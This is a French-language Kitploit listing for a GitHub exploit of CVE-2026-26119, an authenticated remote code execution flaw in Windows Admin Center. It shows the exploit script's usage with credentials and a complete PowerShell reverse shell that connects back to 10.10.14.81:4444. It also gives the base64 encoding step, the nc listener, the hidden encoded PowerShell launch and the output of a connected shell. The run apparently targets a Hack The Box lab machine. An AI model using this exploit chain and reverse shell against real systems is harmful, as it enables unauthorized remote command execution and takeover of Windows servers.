Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-26119 — Exploit d'exécution de code à distance authentifiée pour Windows Admin Center via WinREST/PowerShell invokeCommand ; accepte des identifiants et exécute des commandes PowerShell arbitraires, y compris des shells inversés encodés. | Kitploit
Outils/GitHubGitHub/cyb3rwitch3r/cve-2026-26119
ExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubcyb3rwitch3r/cve-2026-26119

CVE-2026-26119

Exploit d'exécution de code à distance authentifiée pour Windows Admin Center via WinREST/PowerShell invokeCommand ; accepte des identifiants et exécute des commandes PowerShell arbitraires, y compris des shells inversés encodés.

Voir le dépôt
1il y a 11 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-26119

WAC RCE - CVE-2026-26119 RCE authentifiée de Windows Admin Center via WinREST/PowerShell invokeCommand.

Utilisation:

root@kitploit:~
    python3 wac_rce.py <user> <pass> "<powershell command>"
    WAC_PASS=<pass> python3 wac_rce.py <user>

Environnement:

root@kitploit:~
    WAC_BASE  - override target base URL (default below)
    WAC_PASS  - password, used if not passed positionally

root@kitploit:~
┌──(pwn㉿pwn)-[~/HTB/DanglingTree]
└─$ python3 wac_rce.py 'anderson.w' 'Password' 'whoami'      
danglingtree\anderson.w

Comment obtenir un reverse shell:

root@kitploit:~
cat > revshell.ps1 << 'EOF'                                      
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.81',4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535 | % {0}
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i)
    $sendback = (iex $data 2>&1 | Out-String)
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()
EOF
root@kitploit:~
cat revshell.ps1 | iconv -t utf-16le | base64 -w 0 > revshell.b64

Créez un listener nc:

root@kitploit:~
nc -nlvp 4444
root@kitploit:~
python3 wac_rce.py 'anderson.w' 'Password' "Start-Process powershell -WindowStyle Hidden -ArgumentList '-nop -enc $(cat revshell.b64)'"
root@kitploit:~
┌──(pwn㉿pwn)-[~/HTB/DanglingTree]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.81] from (UNKNOWN) [10.129.171.81] 54318
$Host.UI.RawUI.WindowTitle = "shell"
PS C:\Users\anderson.w\Documents>
Télécharger l’outil